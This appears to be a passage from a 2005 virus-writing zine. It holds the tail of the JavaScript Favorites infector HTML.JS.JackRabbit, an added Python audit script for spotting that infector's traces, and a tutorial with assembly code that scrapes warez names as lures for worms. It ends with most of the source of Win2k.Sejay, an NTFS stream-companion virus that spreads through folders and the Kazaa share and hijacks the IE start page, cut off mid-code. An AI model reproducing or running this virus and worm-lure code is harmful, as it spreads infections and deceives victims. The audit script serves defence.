= fso.OpenTextFile(Victim,1,false,0); VicCode = ReadVicCode.ReadAll(); fso.CreateTextFile(Victim); Prepend = fso.OpenTextFile(Victim,2,false,0); Prepend.Write(VirCode+VicCode); Prepend.Close(); } } } FindFile.moveNext(); } } RealURLName = new String(Virus); RealURL = RealURLName.substr(0,RealURLName.length-3) + "DiA"; if (fso.FileExists(RealURL) == true) { ReadURL = fso.GetFile(RealURL); ReadURLLine = ReadURL.OpenAsTextStream(); LoadURL = ReadURLLine.ReadLine(); ReadURLLine.Close(); } else { if (VirPath == FavFolder) { document.write("<b>ERROR! Can't load site</b><br>"); document.write("Please try agian later...<br><br><br>"); document.write(" -the admin JR"); LoadURL = ""; } } Favorit = fso.GetFolder(FavFolder); FindFile = new Enumerator(Favorit.Files); FindFile.moveFirst(); while (FindFile.atEnd() == false) { Victim = FindFile.item(); VictimFile = new String(Victim); if (VictimFile.indexOf("url",VictimFile.length-3) != -1) { NewVirName = new String(Victim); NewVir = NewVirName.substr(0,NewVirName.length-3) + "htm"; Virus.Copy(NewVir); ReadVictim = fso.GetFile(Victim); ReadVictimLine = ReadVictim.OpenAsTextStream(); Result = new String(ReadVictimLine.ReadLine()); while (Result.substr(0,4) != "URL=") { Result = new String(ReadVictimLine.ReadLine()); if (ReadVictimLine.AtEndOfStream == true) { break; } } ReadVictimLine.Close(); URL = new String(Result); if (URL.substr(0,4) != "URL=") { URL = "file:///" + Virus; } else { URL = URL.substr(4,URL.length); } RealURL = NewVirName.substr(0,NewVirName.length-3) + "DiA"; if (fso.FileExists(RealURL) == false) { fso.CreateTextFile(RealURL); RealURLWrite = fso.OpenTextFile(RealURL,2,false,0); RealURLWrite.WriteLine(URL); RealURLWrite.Close(); } ReadVictimLine = ReadVictim.OpenAsTextStream(); Result = new String(ReadVictimLine.ReadLine()); while (Result.substr(0,9) != "IconFile=") { Result = new String(ReadVictimLine.ReadLine()); if (ReadVictimLine.AtEndOfStream == true) { break; } } ReadVictimLine.Close(); IconFile = new 
String(Result); if (IconFile.substr(0,9) != "IconFile=") { IconFile = ""; } else { IconFile = Result; } ReadVictimLine = ReadVictim.OpenAsTextStream(); Result = new String(ReadVictimLine.ReadLine()); while (Result.substr(0,10) != "IconIndex=") { Result = new String(ReadVictimLine.ReadLine()); if (ReadVictimLine.AtEndOfStream == true) { break; } } ReadVictimLine.Close(); IconIndex = new String(Result); if (IconIndex.substr(0,10) != "IconIndex=") { IconIndex = ""; } else { IconIndex = Result; } fso.CreateTextFile(Victim); InfectURL = fso.OpenTextFile(Victim,2,false,0); InfectURL.WriteLine("[InternetShortcut]"); InfectURL.WriteLine("URL=file:///" + NewVir); InfectURL.WriteLine(IconFile); InfectURL.WriteLine(IconIndex); InfectURL.Close(); } FindFile.moveNext(); } if (VirPath == FavFolder) { location = LoadURL; } PayDate = new Date(); if (PayDate.getDate() == 13) { alert("HTML.JS.JackRabbit Virus\n\nby DiA[rRlf] (c)04 GermanY\n\n\nThis is the first non overwriting .url (Favorites) infector."); alert("YOUR FAVORITES - MY VICTIMS\n\Have fun at this day, but don\'t use your favorites... hrhrhr\n\n\nDiA [rRlf]"); location = "http://www.vx-dia.de.vu/"; } } </script> </head> </html> <html> <head> <title>HTML.JS.JackRabbit - First Generation</title> </head> <body bgColor="#AFAFAF" text="#8F8F8F" link="#000000" alink="#000000" vlink="#000000"> <center> <h1>HTML.JS.JackRabbit</h1><br> <h2>by <a href="http://www.vx-dia.de.vu">DiA</a><a href="http://www.rrlf.de">[rRlf]</a> (c)04 GermanY</h2><br> <h3>This is the First non overwriting .url infector ever, written in JavaScript</h3> <h4>Have fun with this nice creature!</h4> <u>thanks:</u><br> BBB<br> Arik<br> Denny<br> Gunter<br> Daniel<br> Katze<br> Nicole<br> Ben<br> Pascal<br> Herr H.<br> Marcel<br> Cindy<br> SPTH<br> philet0ast3r<br> DR-EF<br> vh<br> ElToro<br> Wesely<br> rRlf<br> Assi.GmbH<br> herm1t<br> BMX<br> Bad Luck 13<br> MPR<br> Hardcore<br> beer<br> weed<br> whisky<br> and all i forgot </center> </body> </html>
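Both the .url tutorial and the JackRabbit notes above describe changes that leave checkable traces in a Favorites folder: a shortcut whose URL= points at a local file, a same-named ".DiA" file holding the saved address, and an HTML file whose first line carries the `<JackRabbit>` marker. The Python audit below is an added example for defenders, not part of the original zine; the function names, finding codes and the sample folder are constructed here.

```python
import os
import tempfile

MARKER = "<JackRabbit>"   # first-line infection marker checked by the listing
SIDECAR_EXT = ".DiA"      # extension of the file holding the saved real URL


def parse_url_file(text):
    """Parse .url text into {section: {key: value}} with lower-cased names.

    Written by hand instead of configparser, which would merge a [DEFAULT]
    section (present in some shortcuts) into every other section.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current[key.strip().lower()] = value.strip()
    return sections


def audit_favorites(folder):
    """Return sorted (file name, finding code, detail) tuples for one folder."""
    findings = []
    names = os.listdir(folder)
    present = {n.lower() for n in names}
    for name in names:
        path = os.path.join(folder, name)
        stem, ext = os.path.splitext(name)
        if ext.lower() == ".url":
            with open(path, encoding="latin-1") as fh:
                shortcut = parse_url_file(fh.read()).get("internetshortcut", {})
            url = shortcut.get("url", "")
            if url.lower().startswith("file:"):
                findings.append((name, "local-target", url))
            if (stem + SIDECAR_EXT).lower() in present:
                findings.append((name, "sidecar", stem + SIDECAR_EXT))
        elif ext.lower() in (".htm", ".html"):
            with open(path, encoding="latin-1") as fh:
                first_line = fh.readline()
            if MARKER in first_line:
                findings.append((name, "marker", first_line.strip()[:40]))
    return sorted(findings)


def build_sample(folder):
    """Write a constructed folder: one clean and one rewritten shortcut."""
    files = {
        "F-Prot.url": "[DEFAULT]\nBASEURL=http://www.f-prot.de/down/tools-f.php\n"
                      "[InternetShortcut]\n"
                      "URL=http://www.f-prot.de/down/tools-f.php\n"
                      "IconFile=http://www.f-prot.de/favicon.ico\nIconIndex=1\n",
        "vx - DiA.url": "[InternetShortcut]\n"
                        "URL=file:///C:\\Windows\\Favorites\\vx - DiA.htm\n"
                        "IconFile=http://vx.helith.net/~DiA/icon.ico\n"
                        "IconIndex=1\n",
        "vx - DiA.DiA": "http://www.vx-dia.de.vu/\n",
        # Marker line only; the constructed file contains no script.
        "vx - DiA.htm": "<html><JackRabbit>\n<head></head>\n</html>\n",
        "notes.html": "<html>\n<body>clean page</body>\n</html>\n",
    }
    for name, body in files.items():
        with open(os.path.join(folder, name), "w", encoding="latin-1") as fh:
            fh.write(body)


def demo():
    """Audit the constructed sample folder and return the findings."""
    with tempfile.TemporaryDirectory() as folder:
        build_sample(folder)
        return audit_favorites(folder)


if __name__ == "__main__":
    for name, code, detail in demo():
        print("%-14s %-13s %s" % (name, code, detail))
```

A file: target on its own is only unusual, since a user can bookmark a local page; the sidecar file and the first-line marker are the traces specific to the listing above.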

articles

 ______________________________________________________________
|                                                              |
|    Save your fingers - get your fake names from the i-net    |#
|    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»    |#
|                                                              |#
|                      by DiA/rrlf (c)2005                     |#
|         www.vx-dia.de.vu :: DiA_hates_machine@gmx.de         |#
|______________________________________________________________|#
 ###############################################################

 _Overview___________________________________
|                                            |
|    1_Intro                                 |#
|    2_How to do?                            |#
|    3_Gimme a code, please!                 |#
|    4_Outro                                 |#
|____________________________________________|#
 #############################################


.Disclaimer
»»»»»»»»»»
The author of this article is NOT responsible for possible damages caused by the information
you get here. You do your own things at your own risk, please don't do anything stupid, for
your own security. This document is for educational purposes only. If you do NOT agree with
this, please close this for your own pleasure!


.1_Intro
»»»»»»»
Maybe you know this situation: you write a pretty good massmailer, i-net or P2P worm and you
need some ideas for the fake names. You are sick of seeing names like
"Damn_Fine_Porn.mpg .exe" or "Photoshop Crack working!.exe". So what to do? Get some
inspiration from the internet, go to some warez/crackz sites and copy and paste some real
crack names including application name, exact version number and maybe the author of the
crack. Looking a bit more real than "Micr0soft all products keygen.exe", huh?! You wanna do
some good stuff, including many names... you are now copying and pasting your name number 34,
stupid work, no? At this point I ask you, why do you copy and paste an already existing huge
database of names? Just write a simple but effective code and get thousands of names at
runtime :). So read on and see how easy it is...


.2_How to do?
»»»»»»»»»»»»
OK, what we need for this tutorial is an internet connection. Without it, it will not work of
course. Now save this file - http://crack.ms/cracks/a_1.shtml - locally as - fakenames.txt -.
Take a look: at the head of this file you see some uninteresting stuff, like popup scripts,
meta tags and links. But if you go to the end of this file you see a huge list of the crack
names. That's what we want. Let's pick out one link including the name that we want to
extract:

  <a href="crack.ms?id=19003" target=_blank>ABCalculator 1.1.0 by DBC</a>

And one more:

  <a href="crack.ms?id=1882535" target=_blank>Aare CD Ripper v3.2 by HTBTeam</a>

Fine, now when you have a look you will quickly see that every name is between
(dword - 4 bytes) "ank>" and "</a>". So we have to find "ank>" and we have the start of the
name. Byte by byte we search for the end "</a>" and so we have the length of the name. We
know the start of the name and the length, sweet, we can extract it ;). With this method we
can go on name by name, until we are at the end of the file. Remember that this is only an
example, there are more than 1.000.000 crackz/warez/serialz sites on the internet, you only
have to know how the HTML files they use are structured.

Let's do a little to-do list for our example application:

   1. Make a random valid URL (eg w_2.shtml)
   2. Download this file
   3. Open the file
   4. Get the file size
   5. If it's not big enough goto 1.
   6. Free enough memory
   7. Read whole content in memory
   8. Close File
   9. Find start of next fake name "ank>"
  10. Find end of next fake name "</a>"
  11. Extract fake name
  12. What you wanna do with this name (in example log in a .htm file)
  13. If end of file goto 15.
  14. Jump to 9.
  15. Exit

If it sounds hard to do for you, then the only reason for this is my shitty english ;D. Just
take a look at the small code, and you will see that it is pretty easy to do.


.3_Gimme a code, please!
»»»»»»»»»»»»»»»»»»»»»»» ;-----ExtractNames.asm-----cut-----start--------------------------------------------- include "%fasminc%\win32ax.inc" ;equates ExtractNames: call MakeURL ;make a random url (a-z,1-9) invoke URLDownloadToFile,\ ;download it baby 0,\ ;no activeX required FakeNamesURL,\ ;download this file FakeNamesFile,\ ;save local to this file 0,\ ;reserved 0 ;no interface cmp eax, 0 ;error if it is not null jne ExtractNames ;then make new URL and download again WaitForDownload: invoke CreateFile,\ ;open downloaded file FakeNamesFile,\ ;open this file (in current folder) GENERIC_READ,\ ;only need read access FILE_SHARE_READ,\ ;---""--- 0,\ ;dont need security attributes OPEN_EXISTING,\ ;we want to open the file FILE_ATTRIBUTE_NORMAL,\ ;normal attributes 0 ;no template file cmp eax, INVALID_HANDLE_VALUE ;if error then the download is not finished je WaitForDownload ;try to open again mov dword [FileHandle], eax ;save file handle invoke GetFileSize,\ ;get file size of downloaded file dword [FileHandle],\ ;via file handle 0 ;just get low size mov dword [FileSize], eax ;save file size cmp eax, 7000d ;if its <7000 bytes, then its the error page from crack.ms ja GetMemory ;if not go to get memory invoke CloseHandle,\ ;close handle dword [FileHandle] ;to delete it invoke DeleteFile,\ ;delete invalid fake names file FakeNamesFile ;delete this jmp ExtractNames ;repeat all GetMemory: invoke GlobalAlloc,\ ;get enough memory GMEM_MOVEABLE,\ ;allocation attribute, moveable dword [FileSize] ;that mich memory we need mov dword [MemHandle], eax ;save handle invoke GlobalLock,\ ;get memory start dword [MemHandle] ;via handle mov dword [MemStart], eax ;save start invoke ReadFile,\ ;read whole content from file dword [FileHandle],\ ;open file, handle dword [MemStart],\ ;buffer start dword [FileSize],\ ;read that much BytesRW,\ ;bytes read 0 ;no overlapped structure invoke CloseHandle,\ ;we can close the file dword [FileHandle] ;via handle ;***only for this example*** invoke 
CreateFile,\ ;make the output file OutputFile,\ ;file name GENERIC_WRITE,\ ;with write access FILE_SHARE_WRITE,\ ;---""--- 0,\ ;no security CREATE_ALWAYS,\ ;create it FILE_ATTRIBUTE_NORMAL,\ ;normal attributes 0 ;no temp file mov dword [FileHandle], eax ;save handle ;***only for this example*** mov ebx, dword [MemStart] ;get memory start in ebx add ebx, 3667d ;go over the file header (scripts, meta, links...) ;(keep in mind that this is the structure ; of files on crack.ms, if you use another site ; the structure is different!) push ebx ;save to stack FindMoreNames: pop ebx ;get file position from stack xor ecx, ecx ;set name length counter to null GetStartOfName: cmp dword [ebx], "</bo" ;end of html file (you know </body></html>) je FindNamesEnd ;then goto end cmp dword [ebx], "ank>" ;start of fake name? je GetEndOfName ;if so then get end of name inc ebx ;search next byte jmp GetStartOfName ;go get it dude GetEndOfName: cmp dword [ebx], "</a>" ;end of fake name? je ExtractName ;if so then extract the name inc ecx ;to get fake name length inc ebx ;next place jmp GetEndOfName ;search it ExtractName: push ebx ;save current position in file sub ebx, ecx ;go to the start of string add ebx, 4d ;go after "ank>" sub ecx, 4d ;delete that "</a>" push ecx ;save length of name mov esi, ebx ;source mov edi, FakeName ;destination rep movsb ;copy the whole name to FakeName mov dword [edi], 0 ;clear all after ;**************************************** ;**************************************** ; at this point you can do whatever you want ; with the fake file name! pointer to fake name ; is "FakeName"... 
;**************************************** ;**************************************** ;***only for this example*** pop ecx ;get length of name invoke WriteFile,\ ;write the fake name to file dword [FileHandle],\ ;via handle FakeName,\ ;write this ecx,\ ;length of fake name BytesRW,\ ;bytes written 0 ;overlapped, fuck off invoke WriteFile,\ ;write <br> to the file dword [FileHandle],\ ;via handle Break,\ ;write <br> 4,\ ;length BytesRW,\ ;bytes written 0 ;overlapped, fuck off ;***only for this example*** jmp FindMoreNames ;go get next name FindNamesEnd: ;***only for this example*** invoke CloseHandle,\ ;close output file dword [FileHandle] ;via handle ;***only for this example*** invoke GlobalUnlock,\ ;unlock memory dword [MemHandle] ;handle invoke GlobalFree,\ ;free it! dword [MemHandle] ;via handle invoke DeleteFile,\ ;delete downloaded file FakeNamesFile ;this invoke MessageBox,\ ;show a msgbox that it's done 0,\ "fake names extracting done",\ FakeNamesURL,\ 0 invoke ExitProcess,\ 0 ;end my friend MakeURL: ;procedure invoke GetTickCount ;we only want random stuff in al CharMakeValid: cmp al, 97d ;if its under "a" jb CharAdd ;then add some stuff cmp al, 122d ;if its above "z" ja CharSub ;then sub some stuff jmp CharIsValid ;kewl, now its valid CharAdd: add al, 18d ;add 18 and see if its now valid jmp CharMakeValid ;check it CharSub: sub al, 18d ;sub 18 jmp CharMakeValid ;now a valid character? 
CharIsValid: mov edi, FakeNamesURL ;pointer to url add edi, 23d ;go to the end of the string stosb ;save char at end (eg http://crack.ms/cracks/m) invoke GetTickCount ;get al again DigitMakeValid: cmp al, 49d ;if its under "1" jb DigitAdd ;the add somethin cmp al, 57d ;if its above "9" ja DigitSub ;then subtract it jmp DigitIsValid ;make whole name DigitAdd: add al, 3d ;add 3 jmp DigitMakeValid ;check if its now valid DigitSub: sub al, 3d ;sub 3 jmp DigitMakeValid ;chek if it is valid now DigitIsValid: mov byte [edi], "_" ;eg http://crack.ms/cracks/m_ inc edi ;go behind the "_" stosb ;save digit (eg http://crack.ms/cracks/m_2) mov dword [edi], ".sht" ; http://crack.ms/cracks/m_2.sht mov dword [edi + 4], "ml" ; http://crack.ms/cracks/m_2.shtml ret ;return to call Datas: FakeNamesURL db "http://crack.ms/cracks/",0 ;site to download file from rb 10d ;space for file name (random) FakeNamesFile db "fake.names",0 ;filename to save FileHandle dd ? ;file handle to save FileSize dd ? ;file size to get enough memory MemHandle dd ? ;handle for allocate memory MemStart dd ? ;start of memory BytesRW dd ? ;number of bytes read/write OutputFile db "FakeNames.htm",0 ;save here the names FakeName rb 100d ;save here the fake name Break db "<br>",0 ;just to make a break Imports: data import ;import all needed api's library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ urlmon, "URLMON.DLL" import kernel32,\ CreateFile, "CreateFileA",\ GlobalAlloc, "GlobalAlloc",\ GlobalLock, "GlobalLock",\ ReadFile, "ReadFile",\ GetFileSize, "GetFileSize",\ CloseHandle, "CloseHandle",\ GlobalUnlock, "GlobalUnlock",\ GlobalFree, "GlobalFree",\ WriteFile, "WriteFile",\ DeleteFile, "DeleteFileA",\ GetTickCount, "GetTickCount",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import urlmon,\ URLDownloadToFile, "URLDownloadToFileA" end data ;-----ExtractNames.asm-----cut-----end----------------------------------------------- .4_Outro »»»»»»» Funny, no? 
That small code and that many names ;). But keep in mind that this is only a basic example.
For advanced usage you need, for example, to check if there is an internet connection or not.
Also you don't need to extract only fake names for your worms. What about subjects or bodies?
Maybe a report from an AV site about a new dangerous worm in the wild, and you send the
cleaning program?! Or what about newsgroups and their posts. It's now in your hands to find
useful sites for your fake names, fake subjects and fake bodies. Be creative ;), have a nice
day and happy coding!

DiA/rrlf :: 08.02.2005

sources

Win2k.Sejay DiA ; ____________________________ ; | | ; | Win2k.Sejay |# ; | Stream Companion Virus |## ; | |## ; | coded by DiA/rrlf |## ; | (c)2005 Germany |## ; | |## ; | DiA_hates_machine@gmx.de |## ; | http://www.vx-dia.de.vu |## ; |____________________________|## ; ############################## ; ############################# ; ; ; ; .disclaimer ; This is a source code of a working virus! If you rewrite, copy or assemble it ; you and only YOU are responsible for the things you do! Take care... ; ; ; .intro ; This is a companion virus, using the "Stream Companion" method. Only working ; on NTFS formated harddrives, because FAT don't have the streaming feature. ; Inspired from the first "Stream Companion" virus Win2k.Stream (also the only ; one source I can find to learn from). Dedicated to my mate Erik, who is the ; name-father of this virus. I have heavy commented the source, hopy you like ; it! Only tested under WinXP SP1... ; ; ; .description ; -check OS, if its not Win2000 or above show a fake error message, because virus ; can't execute host or infecting files ; ; -working with a temp file, stored in windows directory as Sejay.DiA ; ; -infect files by creating a new stream with name of last 4 bytes from victim file ; eG Whatever.exe copy to Whatever.exe:ever ; then copy virus over the main stream Whatever.exe ; ; -the virus checks if the stream already exists, if so the file is already infected ; ; -execute host by creating stream name and run it eG execute Whatever.exe:ever , ; if something goes wrong it shows a fake message (also on first generation) ; ; -infect current folder, all sub-folders and the Kazaa Shared Folder (aka P2P spreading) ; ; -log every infected file in a file stored in windows directory called Sejay.htm , ; and if payload date (03.02) the virus sets this file to start page from IE, when ; somethin goes wrong it shows a simple message box with a lyric from Bad Luck 13 ; ; -unpacked the virus is 5632bytes huge, after upx'ing its 
3072bytes small. ; ; ; .assemble ; Assemble it with the Flatassembler GUI version 1.56, you can get this nice assembler ; for free at http://flatassembler.net ! ; ; ; .outro ; For bug report or greets/fucks please mail me at DiA_hates_machine@gmx.de or do a entry ; in my guestbook at http://www.vx-dia.de.vu . And now have fun with this little creature... ; ; ; .source ;-----Sejay.asm-----start-------------------------------------------------------------------------------------------------- include "%fasminc%\win32ax.inc" ;equates Sejay: ;virus start invoke GetVersion ;get os verion (al=05 -> win2000 and above [eg winxp is 0A280105h]) cmp al, 05d ;check al for 05 jne NonNTFS ;if not show some fake error msg invoke GetModuleFileName,\ ;get virus file name 0,\ ;no handle VirusFile,\ ;save here full path 256d ;size of buffer cmp eax, 0 ;error? no virus path, no infection je ExecuteHost ;run host without infection :@ invoke GetWindowsDirectory,\ ;to store the temp file in WinTempDir,\ ;save here 256d ;size of buffer cmp eax, 0 ;error je ExecuteHost ;narf... mov esi, WinTempDir ;to check if the path is valid GetPathEnd: cmp byte [esi], 0 ;end of string? je CheckIfValid ;check for "\" at the end inc esi ;address + 1 jmp GetPathEnd CheckIfValid: cmp byte [esi - 1], "\" ;check for "\" at the end je BindStrings ;then dont append the \ mov byte [esi], "\" ;place a \ at the end of the string mov dword [esi + 1], 0 ; ,0 BindStrings: invoke lstrcat,\ ;append TempFile string via api WinTempDir,\ ;append to windows path TempFile ;append sthis invoke GetWindowsDirectory,\ ;to get payload file PayTempFile,\ ;store it here 256d ;size of buffer mov esi, PayTempFile ;check if it is valid GetPayEnd: cmp byte [esi], 0 ;end? 
je CheckValidness ;same as above inc esi jmp GetPayEnd ;again CheckValidness: cmp byte [esi - 1], "\" ;check string end for \ je MakePayFile ;all is ok mov byte [esi], "\" ;place \ at end mov dword [esi + 1], 0 ;zero MakePayFile: invoke lstrcat,\ ;bind strings PayTempFile,\ ;append to win dir PayFile ;the filename invoke CreateFile,\ ;open temp file PayTempFile,\ ;this GENERIC_READ + GENERIC_WRITE,\ ;read n write access FILE_SHARE_WRITE,\ ;open if can write 0,\ ;no security attributes OPEN_EXISTING,\ ;open the file FILE_ATTRIBUTE_NORMAL,\ ;normal 0 ;no handle cmp eax, INVALID_HANDLE_VALUE ;error? jne SaveHandle ;if not dont create file again call CreatePayloadFile ;if not exist create payload file SaveHandle: mov dword [PayHandle], eax ;save handle call InfectFolder ;infect current folder (all files) invoke FindFirstFile,\ ;get some folders Folder,\ ;by search for *.* Win32FindData ;already defined mov dword [FolderHandle], eax ;save handle FindMoreFolder: cmp eax, 0 ;no more folders?! je CloseFolderHandle ;then close handle and execute host stream invoke GetCurrentDirectory,\ ;to get a valid SetCurrentDir.. path 256d,\ ;size of buffer VictimFolder ;save there mov esi, VictimFolder ;get end of string GetEndDir: cmp byte [esi], 0 ;check for zero -> end je HaveEndDir ;check for validness inc esi ;next byte jmp GetEndDir ;check HaveEndDir: cmp byte [esi - 1], "\" ;is there a \ je DirValid ;if so, it is valid mov byte [esi], "\" ;if not make it valid mov dword [esi + 1], 0 ;end of string DirValid: mov esi, Win32FindData.cFileName ;get end of victim string GetEndVictim: cmp byte [esi], 0 ;end of string? je HaveEndVictim ;if so jmp to ... inc esi ;next byte jmp GetEndVictim ;check it baby HaveEndVictim: cmp byte [esi - 1], "." ;found a . or .. ?! je FindNextFolder ;if so find next cmp byte [esi - 4], "." ;is it a file? 
je FindNextFolder ;if so find next mov byte [esi], "\" ;to get a valid path mov dword [esi + 1], 0 ;zero at the end invoke lstrcat,\ ;bind strings VictimFolder,\ ;string1 Win32FindData.cFileName ;add this invoke SetCurrentDirectory,\ ;change directory VictimFolder ;to this cmp eax, 0 ;error? je FindNextFolder ;then find next call InfectFolder ;infect it baby mov esi, VictimFolder ;to change directory back GetFirstFolder1: cmp byte [esi], 0 ;check for end je HaveFirstFolder1 ;have it inc esi ;continue jmp GetFirstFolder1 ;... HaveFirstFolder1: sub esi, 2 ;get before "\" GetFirstFolder2: cmp byte [esi], "\" ;check for \ je HaveFirstFolder2 ;change back dec esi ;-1 jmp GetFirstFolder2 ;check HaveFirstFolder2: mov dword [esi + 1], 0 ;clear all after invoke SetCurrentDirectory,\ ;set it new VictimFolder ;to first folder FindNextFolder: invoke FindNextFile,\ ;find next dword [FolderHandle],\ ;the handle Win32FindData ;the structure jmp FindMoreFolder ;go get it CloseFolderHandle: invoke CloseHandle,\ ;close handle dword [FolderHandle] ;this invoke RegOpenKeyEx,\ ;open key HKEY_CURRENT_USER,\ ;with this handle KazaaShare,\ ;this subkey 0,\ ;reserved KEY_QUERY_VALUE,\ ;read a value KazaaRegHandle ;save there the handle cmp eax, 0 ;error? jne ExecuteHost ;no kazaa installed invoke RegQueryValueEx,\ ;read the value (shared folder path) dword [KazaaRegHandle],\ ;handle KazzaFolder,\ ;DlDir0 0,\ ;reserved 0,\ ;its a string KazaaVictim,\ ;save there the path KazaaSize ;size of buffer cmp eax, 0 ;error? jne CloseRegKey ;the close the key, no infection mov esi, KazaaVictim ;to check validness GetKazaaEnd: cmp byte [esi], 0 ;end of string? je HaveKazaaEnd ;jmp to there inc esi ;next place jmp GetKazaaEnd ;go for it! HaveKazaaEnd: cmp byte [esi - 1], "\" ;check for \ je KazaaSlash ;if exist jmp to ... 
mov byte [esi], "\" ;make it valid mov dword [esi + 1], 0 ;zero at end KazaaSlash: invoke SetCurrentDirectory,\ ;change to kazaa folder KazaaVictim ;infect this please call InfectFolder ;DO IT! CloseRegKey: invoke RegCloseKey,\ ;close key dword [KazaaRegHandle] ;with handle ExecuteHost: mov esi, VirusFile ;make host file string GetHostFileStream: cmp byte [esi], 0 ;0 is the end of the string je AppendHostStream ;then append stream name inc esi ;address + 1 jmp GetHostFileStream ;check next byte AppendHostStream: mov edi, dword [esi - 8d] ;load a dword in edi (last 4 chars of host file name) mov byte [esi], ":" ;append a : and then the name mov dword [esi + 1d], edi ;append last dword of victims name mov dword [esi + 5d], 0 ;append the zero invoke GetCommandLine ;get commandline (maybe user did some parameters) invoke CreateProcess,\ ;run host file stream VirusFile,\ ;current file + streamname = host stream eax,\ ;commandline in eax 0,\ ;no attributes 0,\ ;... 0,\ ;no flag CREATE_NEW_CONSOLE,\ ;run new prog 0,\ ;no new enviroment block 0,\ ;no current directory StartupInfo,\ ;structure ProcessInfo ;structure cmp eax, 0 ;error starting stream? je CantRunHost ;show error msg box invoke GetSystemTime,\ ;payload action?! Systemtime ;structure cmp word [Systemtime.wMonth], 02d ;2. month of the year? jne Exit ;if not the exit cmp word [Systemtime.wDay], 03d ;03.02? jne Exit ;goodbye invoke RegOpenKeyEx,\ ;open registry key HKEY_CURRENT_USER,\ ;handle PaySubkey,\ ;open this 0,\ ;reserved KEY_SET_VALUE,\ ;set a value PayRegHandle ;save here the handle cmp eax, 0 ;error? jne PayloadMessage ;then other payload invoke lstrlen,\ ;get lenth of pay file string PayTempFile ;here inc eax ;including the zero invoke RegSetValueEx,\ ;change start page of IE dword [PayRegHandle],\ ;handle of open key PayIEStart,\ ;value name 0,\ ;reserved REG_SZ,\ ;its a string PayTempFile,\ ;this data eax ;size cmp eax, 0 ;error? 
jne PayloadMessage ;hmm, then use a simple msgbox invoke RegCloseKey,\ ;close it dword [PayRegHandle] ;with handle jmp Exit ;bye PayloadMessage: invoke MessageBox,\ ;show user a msgbox 0,\ ;bad luck 13 lyric PayLyric,\ ;more lines then one "You are infected with Win2k.Sejay! :: coded by DiA/rrlf (c)05",\ MB_ICONINFORMATION ;information style Exit: invoke CloseHandle,\ ;close payload file dword [PayHandle] ;with handle invoke ExitProcess,\ ;exit virus 0 NonNTFS: invoke MessageBox,\ ;no ntfs formated, cant run virus 0,\ "This application requires a NTFS formated disk.",\ ;) "ERROR 53656A6179",\ ;hex for Sejay MB_ICONERROR ;scary error jmp Exit ;dont grumble the win9x user anymore ^^ CantRunHost: invoke MessageBox,\ ;cant run host :/ 0,\ "Application execution failed.",\ "ERROR 446941",\ ;hex for DiA MB_ICONERROR jmp Exit CreatePayloadFile: invoke CreateFile,\ ;create the payload file in win dir PayTempFile,\ ;create this GENERIC_READ + GENERIC_WRITE,\ ;read n write FILE_SHARE_WRITE,\ ;to write 0,\ ;no attributes CREATE_NEW,\ ;new file FILE_ATTRIBUTE_NORMAL,\ ;normal all 0 ;no handle push eax ;save handle invoke WriteFile,\ ;write file header eax,\ ;handle PayHTMLhead,\ ;points to buffer 133d,\ ;numers of bytes to write PayBytesWritten,\ ;bytes written 0 ;no overlapped pop eax ;get handle ret ;return InfectFolder: invoke FindFirstFile,\ ;find first vicitim (*.exe) Victims,\ ;exe Win32FindData ;structure mov dword [FindHandle], eax ;save handle FindMoreFiles: cmp eax, 0 ;no more files?! je InfectDone ;restore host file name (steam) and run it invoke lstrcpy,\ ;copy victim path to appen stream name VictimStream,\ ;copy to this Win32FindData.cFileName ;from this (eax points to buffer string ..VistimStream..) 
GetVictimFileStream: cmp byte [eax], 0 ;get end of string je CheckVirusFile ;check if founded file is the virus file itself & append the stream name inc eax ;address + 1 jmp GetVictimFileStream ;next byte CheckVirusFile: mov ebx, VirusFile ;to jmp to the end of the string GetVirusFileEnd: cmp byte [ebx], 0 ;zero = end je CompareFiles ;copare the strings (1dowrd (xxxx)) inc ebx ;if not address + 1 jmp GetVirusFileEnd CompareFiles: mov esi, dword [ebx - 8d] ;load a dword befor extension mov edi, dword [eax - 8d] ;... cmp esi, edi ;compare je FindNextVictim ;dont belong the virus mov byte [eax], ":" ;append a : and then the name mov dword [eax + 1d], edi ;append last dword of victims name mov dword [eax + 5d], 0 ;append the zero invoke CopyFile,\ ;copy victim to temp file Win32FindData.cFileName,\ ;this to WinTempDir,\ ;temp file 0 ;copy always cmp eax, 0 ;error? je FindNextVictim ;dont infect if we cant make a temp file invoke CopyFile,\ ;check if we can copy the temp file to stream name WinTempDir,\ ;if not the file is already infected VictimStream,\ ;to this name Victim.exe:ctim 1 ;not copy always cmp eax, 0 ;error? je FindNextVictim ;then find next file invoke CopyFile,\ ;copy virus file to vivtim VirusFile,\ ;this Win32FindData.cFileName,\ ;to this 0 ;always cmp eax, 0 ;error?! je FindNextVictim ;no infection, narf invoke CopyFile,\ ;copy victim to stream WinTempDir,\ ;temp file VictimStream,\ ;this 0 ;always cmp eax, 0 ;erroreee je FindNextVictim ;more more more invoke SetFilePointer,\ ;end of payload file dword [PayHandle],\ ;handle of file 0,\ ;no distance, only end 0,\ ;brrr FILE_END ;there we go invoke WriteFile,\ ;infected html header <html><body> dword [PayHandle],\ ;file handle PayInfHeader,\ ;filename + scary message 12d,\ ;number of bytes to write PayBytesWritten,\ ;number of bytes written 0 ;no structure invoke lstrcat,\ ;append scarey infected! 
